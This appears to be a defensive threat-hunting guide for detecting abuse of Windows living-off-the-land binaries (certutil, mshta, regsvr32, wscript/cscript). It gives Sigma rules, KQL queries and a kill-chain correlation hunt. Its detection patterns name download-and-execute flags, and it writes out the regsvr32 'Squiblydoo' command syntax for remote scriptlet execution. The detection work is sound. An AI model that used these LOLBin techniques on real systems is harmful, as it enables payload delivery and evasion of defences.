Why LOLBins Matter
Living-off-the-land binaries (LOLBins) are legitimate, Microsoft-signed system tools that adversaries abuse to execute code, download files, and establish persistence. The appeal is obvious: they’re present on every Windows endpoint, they’re signed by Microsoft, and many organizations don’t have detection coverage for their malicious usage patterns.
The challenge in hunting LOLBins is separating the signal from the enormous noise of legitimate use. certutil.exe manages certificates legitimately. regsvr32.exe registers COM objects legitimately. The key is understanding what malicious invocations look like versus the baseline.
Pre-Hunt Baseline Questions
Before starting, answer these questions about your environment:
- Do administrators use certutil for certificate management? From which hosts?
- Is mshta.exe used by any legitimate software in your environment?
- What directories do legitimate scripts (.vbs, .js) run from?
- Which accounts normally invoke wscript/cscript?
Build exclusions around the answers. Don’t start hunting without understanding your baseline — you’ll drown in false positives.
Hunt 1: certutil.exe Abuse
certutil.exe can decode base64 files and download URLs — both heavily abused for payload staging.
Sigma Rule — certutil URL Download
title: CertUtil Download or Decode Abuse
id: 19b08b1b-0e3a-4b3d-a2d1-c0abcd123456
status: stable
description: Detects certutil used to download files from URLs or decode base64
references:
- https://attack.mitre.org/techniques/T1218/
- https://lolbas-project.github.io/lolbas/Binaries/Certutil/
author: SOC Analyst Hub
tags:
- attack.execution
- attack.t1218
- attack.defense_evasion
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\certutil.exe'
CommandLine|contains:
- '-urlcache'
- '-decode'
- '-encode'
- '-decodehex'
- 'http://'
- 'https://'
- 'ftp://'
filter_legitimate:
CommandLine|contains:
- 'DisplayDefaultCertificates'
- '-v'
- '-store'
- '-user'
condition: selection and not filter_legitimate
falsepositives:
- Legitimate certificate management operations
- PKI administration scripts
level: highKQL Hunt Query
DeviceProcessEvents
| where FileName == "certutil.exe"
| where ProcessCommandLine has_any ("-urlcache", "-decode", "-encode", "http://", "https://", "ftp://")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| sort by Timestamp descPivot points when you find a hit: What file was downloaded/decoded? Is it still on disk? Check for subsequent execution of the decoded file within 5 minutes using the same process ancestry.
Hunt 2: mshta.exe Abuse
mshta.exe (Microsoft HTML Application Host) executes HTA files and inline VBScript/JavaScript via the javascript: and vbscript: URI handlers. Attackers use it to execute payloads that bypass AppLocker (HTA files run with the trust of a signed binary).
Sigma Rule — mshta Inline Execution
title: Mshta Inline Script or Remote HTA Execution
id: 2c3d4e5f-6789-0abc-def1-234567890abc
status: stable
description: Detects mshta executing inline scripts or remote HTA files
tags:
- attack.execution
- attack.t1218.005
logsource:
category: process_creation
product: windows
detection:
selection_inline:
Image|endswith: '\mshta.exe'
CommandLine|contains:
- 'javascript:'
- 'vbscript:'
- 'about:blank'
selection_remote:
Image|endswith: '\mshta.exe'
CommandLine|contains:
- 'http://'
- 'https://'
- 'ftp://'
- '\\\\' # UNC path
selection_suspicious_parent:
Image|endswith: '\mshta.exe'
ParentImage|endswith:
- '\winword.exe'
- '\excel.exe'
- '\powerpnt.exe'
- '\outlook.exe'
- '\cmd.exe'
condition: selection_inline or selection_remote or selection_suspicious_parent
level: highKey indicator: mshta spawned by Office applications strongly suggests a malicious macro or document exploit delivering an HTA payload.
Hunt 3: regsvr32 “Squiblydoo” Abuse
The “Squiblydoo” technique uses regsvr32.exe /s /n /u /i:<url> scrobj.dll to download and execute arbitrary COM scriptlets. It’s been in active use since 2016 and remains effective against environments without application control.
title: Regsvr32 Squiblydoo Remote Scriptlet Execution
id: 3d4e5f60-7891-0bcd-ef12-345678901bcd
status: stable
description: Detects regsvr32 loading remote scriptlets via scrobj.dll
tags:
- attack.defense_evasion
- attack.t1218.010
logsource:
category: process_creation
product: windows
detection:
selection_scrobj:
Image|endswith: '\regsvr32.exe'
CommandLine|contains:
- 'scrobj.dll'
- 'scrobj'
selection_remote:
Image|endswith: '\regsvr32.exe'
CommandLine|contains:
- 'http://'
- 'https://'
- '/i:'
condition: selection_scrobj or selection_remote
falsepositives:
- Legitimate COM object registration (no network download involved)
level: highNetwork Pivot for regsvr32
// Find regsvr32 processes that made outbound connections
DeviceNetworkEvents
| join kind=inner (
DeviceProcessEvents
| where FileName == "regsvr32.exe"
| project ProcessId, DeviceId, Timestamp, CommandLine
) on DeviceId, ProcessId
| where RemotePort in (80, 443, 8080, 8443)
| project Timestamp, DeviceName, CommandLine, RemoteIP, RemotePort, RemoteUrlHunt 4: wscript.exe and cscript.exe
Windows Script Host (wscript/cscript) executes .vbs, .js, and .wsf files — frequently abused in phishing chains where a document drops a script that downloads and executes a second-stage payload.
Sigma Rule — Script Execution from Suspicious Paths
title: Windows Script Host Executing From Suspicious Location
id: 4e5f6071-8902-1cde-f123-456789012cde
status: stable
tags:
- attack.execution
- attack.t1059.005
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\wscript.exe'
- '\cscript.exe'
CommandLine|contains:
- '\AppData\Local\Temp\\'
- '\AppData\Roaming\\'
- '\Users\Public\\'
- 'C:\Windows\Temp\\'
- '\Downloads\\'
filter_legitimate:
CommandLine|contains:
- 'C:\Program Files\\'
- 'C:\Program Files (x86)\\'
condition: selection and not filter_legitimate
level: highParent Process Hunting
Scripts delivered via phishing are usually executed with Office or browser as the parent. This is one of the highest-fidelity LOLBin signals available:
DeviceProcessEvents
| where FileName in ("wscript.exe", "cscript.exe")
| where InitiatingProcessFileName in~ (
"winword.exe", "excel.exe", "powerpnt.exe",
"outlook.exe", "msaccess.exe",
"chrome.exe", "msedge.exe", "firefox.exe"
)
| project Timestamp, DeviceName, AccountName,
InitiatingProcessFileName, ProcessCommandLine
| sort by Timestamp descCorrelation Hunt: The Full Kill Chain
LOLBin abuse rarely happens in isolation. The full kill chain typically looks like:
- User opens malicious document (Office process) or downloads a file (browser process)
- LOLBin spawned by Office/browser parent
- LOLBin makes outbound HTTP/S connection
- Second-stage binary written to temp directory
- Second-stage executed (often via another LOLBin or PowerShell)
// Chain: Office parent → LOLBin → network → file write
let lolbins = dynamic(["certutil.exe", "mshta.exe", "regsvr32.exe", "wscript.exe", "cscript.exe", "rundll32.exe"]);
let office_apps = dynamic(["winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"]);
DeviceProcessEvents
| where FileName in~ (lolbins)
| where InitiatingProcessFileName in~ (office_apps)
| project LolbinTime = Timestamp, DeviceName, AccountName,
LOLBin = FileName, ProcessId,
OfficeParent = InitiatingProcessFileName,
CommandLineWhen you find matches, pivot to DeviceNetworkEvents and DeviceFileEvents on the same DeviceName and ProcessId within a 5-minute window to see the full picture.
Building Long-Term Detection
After hunting, convert your most valuable queries into scheduled detections:
- Identify the highest-fidelity indicators (Office → LOLBin parent chains are almost always malicious)
- Tune out the legitimate baseline you documented pre-hunt
- Convert to Sigma with appropriate
level(Office → LOLBin = critical; LOLBin from temp = high; raw LOLBin execution = medium) - Deploy and set response SLAs based on level
LOLBin detections are some of the most valuable to maintain — they cover initial access, execution, and defense evasion across a huge range of threat actors.